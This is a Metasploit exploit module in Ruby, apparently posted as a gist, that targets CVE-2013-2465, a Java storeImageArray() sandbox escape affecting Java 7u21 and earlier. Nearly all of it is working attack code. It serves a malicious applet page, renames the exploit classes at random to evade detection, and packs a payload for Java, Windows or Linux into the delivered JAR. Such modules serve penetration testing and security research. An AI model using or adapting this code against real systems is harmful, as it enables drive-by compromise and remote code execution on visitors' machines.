java_storeimagearray

gistfile1.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::BrowserExploitServer

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
      'Description'   => %q{
        This module abuses an Invalid Array Indexing Vulnerability on the
        static function storeImageArray() function in order to cause a
        memory corruption and escape the Java Sandbox. The vulnerability
        affects Java version 7u21 and earlier. The module, which doesn't bypass
        click2play, has been tested successfully on Java 7u21 on Windows and
        Linux systems.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown',  # From PacketStorm
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit
        ],
      'References'    =>
        [
          [ 'CVE', '2013-2465' ],
          [ 'OSVDB', '96269' ],
          [ 'EDB', '27526' ],
          [ 'URL', 'http://packetstormsecurity.com/files/122777/' ],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
        ],
      'Platform'      => %w{ java linux win },
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          :java   => /1\.[6-7]/
        },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win',
              'os_name'  => 'Microsoft Windows',
              'arch'     => ARCH_X86
            }
          ],
          [ 'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux',
              'os_name'  => 'Linux',
              'arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 12 2013'
      ))
  end

  def setup
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
    @color_model_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)

    @exploit_class.gsub!("Exploit", @exploit_class_name)
    @exploit_class.gsub!("MyColorModel", @color_model_class_name)
    @exploit_class.gsub!("MyColorSpace", @color_space_class_name)

    @color_model_class.gsub!("Exploit", @exploit_class_name)
    @color_model_class.gsub!("MyColorModel", @color_model_class_name)
    @color_model_class.gsub!("MyColorSpace", @color_space_class_name)


    @color_space_class.gsub!("Exploit", @exploit_class_name)
    @color_space_class.gsub!("MyColorModel", @color_model_class_name)
    @color_space_class.gsub!("MyColorSpace", @color_space_class_name)

    super
  end

  def on_request_exploit(cli, request, target_info )
    print_debug("Requesting: #{request.uri}")

    if request.uri !~ /\.jar$/i
      if not request.uri =~ /\/$/
        print_status("Sending redirect...")
        send_redirect(cli, "#{get_resource}/", '')
        return
      end

      print_status("Sending HTML...")
      #send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})
      send_exploit_html(cli, exploit_template)
      return
    end

    print_status("Sending .jar file...")
    send_response(cli, generate_jar(cli, target_info), {'Content-Type'=>'application/java-archive'})
  end

  def exploit_template
    jar_name = rand_text_alpha(5+rand(3))

    html_template = %Q|<html>
    <head>
    </head>
    <body>
    <applet archive="<%=jar_name%>.jar" code="<%=@exploit_class_name%>" width="1000" height="1000">
    </applet>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def get_payload(cli, browser_info)
    arch     = browser_info[:arch]
    platform = browser_info[:os_name]

    # Fix names for consisntecy so our API can find the right one
    # Originally defined in lib/msf/core/constants.rb
    platform = platform.gsub(/^Mac OS X$/, 'OSX')
    platform = platform.gsub(/^Microsoft Windows$/, 'Windows')

    regenerate_payload(cli, platform, arch)
  end

  def generate_jar(cli, target_info)

    p = get_payload(cli, target_info)
    jar  = p.encoded_jar

    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str = rand_text_alpha("payload".length)
    jar.entries.each { |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    }
    jar.build_manifest

    return jar.pack
  end

end